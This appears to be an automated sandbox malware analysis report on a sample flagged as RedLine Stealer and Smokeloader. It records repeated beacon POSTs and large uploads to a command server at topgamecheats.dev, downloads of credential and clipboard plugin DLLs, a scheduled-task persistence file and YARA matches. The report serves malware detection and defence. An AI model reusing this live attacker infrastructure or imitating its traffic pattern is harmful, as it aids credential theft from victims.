Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTAwMzE=Host: topgamecheats.devContent-Length: 90183Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 93.123.39.96 93.123.39.96
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NET1-ASBG NET1-ASBG
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00414780 InternetCloseHandle,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00414780
Source: global traffic HTTP traffic detected: GET /8bjndDcoA3/Plugins/cred64.dll HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: GET /8bjndDcoA3/Plugins/clip64.dll HTTP/1.1Host: topgamecheats.dev
Source: unknown DNS traffic detected: queries for: topgamecheats.dev
Source: unknown HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002E62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/Plugins/clip64.dll
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EAC000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000002.2886494083.0000000002E62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/Plugins/cred64.dll
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EAC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/Plugins/cred64.dlllD
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002E62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/Plugins/cred64.dll~
Source: Dctooux.exe, 0000001C.00000003.2467481991.0000000002EC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php
Source: Dctooux.exe, 0000001C.00000003.2467481991.0000000002EC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php$
Source: Dctooux.exe, 0000001C.00000003.2467481991.0000000002EC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php(
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EAC000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000002.2886494083.0000000002E62000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000002.2886494083.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002E62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1//(
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=11
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1h
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002E62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpJo
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpW
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpX
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpd
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpm
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php~
Source: Amcache.hve.3.dr String found in binary or memory: http://upx.sf.net

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0000001C.00000002.2886462605.0000000002E24000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1841496983.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000014.00000002.1848243926.0000000002F92000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1841617088.0000000002FF2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001C.00000002.2886785798.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000014.00000002.1848101190.0000000002EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Contains functionality to call native functions
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0041FEA7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 0_2_0041FEA7
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_0041FEA7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 20_2_0041FEA7
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_0041FEA7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 28_2_0041FEA7
Creates files inside the system directory
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe File created: C:\Windows\Tasks\Dctooux.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00409DA0 0_2_00409DA0
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0043B163 0_2_0043B163
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00427101 0_2_00427101
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00424123 0_2_00424123
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0044A2E9 0_2_0044A2E9
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00446448 0_2_00446448
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_004294A2 0_2_004294A2
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00424912 0_2_00424912
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0044AA3B 0_2_0044AA3B
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0044AB5B 0_2_0044AB5B
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0044BEA0 0_2_0044BEA0
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00404FE0 0_2_00404FE0
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00445FB0 0_2_00445FB0
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F45247 0_2_02F45247
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F86217 0_2_02F86217
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F7B3CA 0_2_02F7B3CA
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F6438A 0_2_02F6438A
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F67368 0_2_02F67368
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F4A007 0_2_02F4A007
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F8C107 0_2_02F8C107
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F69709 0_2_02F69709
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F8A550 0_2_02F8A550
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F64B79 0_2_02F64B79
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F8ACA2 0_2_02F8ACA2
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F8ADC2 0_2_02F8ADC2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_00409DA0 20_2_00409DA0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_0043B163 20_2_0043B163
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_00427101 20_2_00427101
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_00424123 20_2_00424123
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_0044A2E9 20_2_0044A2E9
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_00446448 20_2_00446448
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_004294A2 20_2_004294A2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_00424912 20_2_00424912
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_0044AA3B 20_2_0044AA3B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_0044AB5B 20_2_0044AB5B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_0044BEA0 20_2_0044BEA0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_00404FE0 20_2_00404FE0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_00445FB0 20_2_00445FB0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02EF5247 20_2_02EF5247
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F36217 20_2_02F36217
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F2B3CA 20_2_02F2B3CA
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F1438A 20_2_02F1438A
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F17368 20_2_02F17368
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02EFA007 20_2_02EFA007
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F3C107 20_2_02F3C107
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F19709 20_2_02F19709
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F3A550 20_2_02F3A550
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F14B79 20_2_02F14B79
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F3ACA2 20_2_02F3ACA2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F3ADC2 20_2_02F3ADC2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_00424123 28_2_00424123
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_0044A2E9 28_2_0044A2E9
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_00446448 28_2_00446448
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_00424912 28_2_00424912
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_0044AA3B 28_2_0044AA3B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_0044AB5B 28_2_0044AB5B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_00404FE0 28_2_00404FE0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_0043B163 28_2_0043B163
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_00427101 28_2_00427101
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_0040F420 28_2_0040F420
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_004294A2 28_2_004294A2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_0044BEA0 28_2_0044BEA0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_00445FB0 28_2_00445FB0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_0490A550 28_2_0490A550
